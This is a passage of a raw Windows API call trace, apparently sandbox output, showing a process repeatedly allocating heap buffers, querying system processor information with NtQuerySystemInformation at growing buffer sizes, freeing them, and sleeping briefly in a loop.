lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0281.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0281.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0281.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0281.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0281.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.025] Sleep (dwMilliseconds=0x110) [0281.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0281.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0281.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0281.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0281.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0281.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0281.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0281.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0281.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.035] Sleep (dwMilliseconds=0x110) [0281.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0281.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0281.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0281.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0281.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0281.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0281.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0281.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0281.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.052] Sleep (dwMilliseconds=0x110) [0281.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0281.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0281.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0281.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0281.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0281.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0281.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0281.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0281.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.068] Sleep (dwMilliseconds=0x110) [0281.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0281.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0281.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0281.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0281.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0281.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0281.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0281.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0281.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.080] Sleep (dwMilliseconds=0x110) [0281.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0281.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0281.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0281.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0281.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0281.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0281.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0281.098] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.099] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0281.099] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.100] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.100] Sleep (dwMilliseconds=0x110) [0281.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0281.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0281.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0281.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0281.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0281.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0281.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0281.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0281.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.113] Sleep (dwMilliseconds=0x110) [0281.152] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0281.152] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.152] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0281.152] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0281.152] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.153] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0281.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0281.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0281.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0281.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0281.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.155] Sleep (dwMilliseconds=0x110) [0281.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0281.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0281.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0281.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0281.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0281.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0281.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0281.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0281.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.177] Sleep (dwMilliseconds=0x110) [0281.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0281.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0281.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0281.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0281.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0281.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0281.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0281.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0281.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.193] Sleep (dwMilliseconds=0x110) [0281.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0281.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0281.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0281.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0281.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0281.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0281.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0281.206] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0281.207] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.207] Sleep (dwMilliseconds=0x110) [0281.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0281.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0281.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0281.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0281.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0281.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0281.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0281.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0281.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.224] Sleep (dwMilliseconds=0x110) [0281.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0281.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0281.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0281.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0281.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0281.240] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.241] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0281.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0281.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.243] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0281.243] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.245] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.249] Sleep (dwMilliseconds=0x110) [0281.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0281.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0281.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0281.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0281.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0281.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0281.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0281.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0281.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.269] Sleep (dwMilliseconds=0x110) [0281.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0281.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0281.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0281.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, 